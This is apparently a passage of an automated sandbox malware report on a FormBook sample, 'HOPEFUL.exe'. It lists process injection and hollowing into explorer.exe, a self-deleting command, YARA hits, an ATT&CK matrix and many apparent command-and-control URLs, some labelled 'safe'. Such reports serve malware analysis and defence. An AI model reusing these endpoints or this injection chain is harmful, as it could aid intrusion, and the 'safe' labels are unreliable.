          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 35.169.40.107 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exe | Network Connect: 174.136.37.109 80
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1040000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: EB9008
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 0000000D.00000000.297448292.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Queries volume information: C:\Users\user\Desktop\HOPEFUL.exe VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts (1) | Shared Modules (1) | Valid Accounts (1) | Valid Accounts (1) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (121) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Access Token Manipulation (1) | Masquerading (1) | LSASS Memory | Virtualization/Sandbox Evasion (3) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection (812) | Valid Accounts (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (3) | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (3) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Disable or Modify Tools (1) | Cached Domain Credentials | System Information Discovery (112) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (812) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Deobfuscate/Decode Files or Information (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Obfuscated Files or Information (3) | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
          Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Software Packing (1) | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

          Behavior Graph

Behavior Graph ID: 339365
Sample: HOPEFUL.exe
Startdate: 13/01/2021
Architecture: WINDOWS
Score: 100

Start
  DNS/IP Info: www.eaglesnestpropheticministry.com; eaglesnestpropheticministry.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  started -> HOPEFUL.exe (4)
    Created Files: C:\Users\user\AppData\...\AddInProcess32.exe, PE32 (dropped); C:\Users\user\AppData\...\HOPEFUL.exe.log, ASCII (dropped)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
    started -> AddInProcess32.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      injected -> explorer.exe
        DNS/IP Info: tiendazoom.com 174.136.37.109, 49759, 80 IHNETUS United States; registeredagentfirm.com 34.98.99.30, 49758, 80 GOOGLEUS United States; 3 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started -> cmmon32.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started -> cmd.exe (1)
            started -> conhost.exe

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
HOPEFUL.exe | 31% | ReversingLabs | ByteCode-MSIL.Packed.Generic
HOPEFUL.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
5.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.the343radio.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.novergi.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.eaglesnestpropheticministry.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.bebywye.site/jqc/www.ip-freight.com | 0% | Avira URL Cloud | safe
http://www.the343radio.com | 0% | Avira URL Cloud | safe
http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.weddingmustgoon.comReferer: | 0% | Avira URL Cloud | safe
http://www.11sxsx.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP | 0% | Avira URL Cloud | safe
http://www.ip-freight.comReferer: | 0% | Avira URL Cloud | safe
http://www.ip-freight.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.eaglesnestpropheticministry.comReferer: | 0% | Avira URL Cloud | safe
http://www.novergi.com | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.theorangepearl.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.lhc965.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.registeredagentfirm.comReferer: | 0% | Avira URL Cloud | safe
http://www.weddingmustgoon.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.internetmarkaching.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.kenniscourtureconsignments.com | 0% | Avira URL Cloud | safe
http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.weddingmustgoon.com | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.strahlenschutz.digital/jqc/ | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.internetmarkaching.comReferer: | 0% | Avira URL Cloud | safe
http://www.tiendazoom.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.topheadlinetowitness-today.infoReferer: | 0% | Avira URL Cloud | safe
http://www.novergi.comReferer: | 0% | Avira URL Cloud | safe
http://www.theorangepearl.com | 0% | Avira URL Cloud | safe
http://www.novergi.com/jqc/M | 0% | Avira URL Cloud | safe
http://www.tiendazoom.comReferer: | 0% | Avira URL Cloud | safe
http://www.ip-freight.com/jqc/www.toweroflifeinc.com | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.theorangepearl.com/jqc/www.11sxsx.com | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.strahlenschutz.digitalReferer: | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.11sxsx.comReferer: | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.ip-freight.com | 0% | Avira URL Cloud | safe
http://www.strahlenschutz.digital | 0% | Avira URL Cloud | safe
http://www.topheadlinetowitness-today.info | 0% | Avira URL Cloud | safe
http://www.toweroflifeinc.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.topheadlinetowitness-today.info/jqc/ | 0% | Avira URL Cloud | safe
http://www.kenniscourtureconsignments.com/jqc/ | 0% | Avira URL Cloud | safe
http://www.bebywye.siteReferer: | 0% | Avira URL Cloud | safe
http://www.lhc965.com | 0% | Avira URL Cloud | safe
http://www.toweroflifeinc.comReferer: | 0% | Avira URL Cloud | safe
http://www.bebywye.site/jqc/ | 0% | Avira URL Cloud | safe
http://www.bebywye.site | 0% | Avira URL Cloud | safe
http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p | 0% | Avira URL Cloud | safe
http://www.lhc965.comReferer: | 0% | Avira URL Cloud | safe
http://www.the343radio.com/jqc/www.registeredagentfirm.com | 0% | Avira URL Cloud | safe
http://www.toweroflifeinc.com | 0% | Avira URL Cloud | safe
http://www.registeredagentfirm.com | 0% | Avira URL Cloud | safe
http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp | 0% | Avira URL Cloud | safe
http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com | 0% | Avira URL Cloud | safe
http://www.tiendazoom.com | 0% | Avira URL Cloud | safe
http://www.11sxsx.com/jqc/www.lhc965.com | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com | 0% | Avira URL Cloud | safe
http://www.kenniscourtureconsignments.comReferer: | 0% | Avira URL Cloud | safe
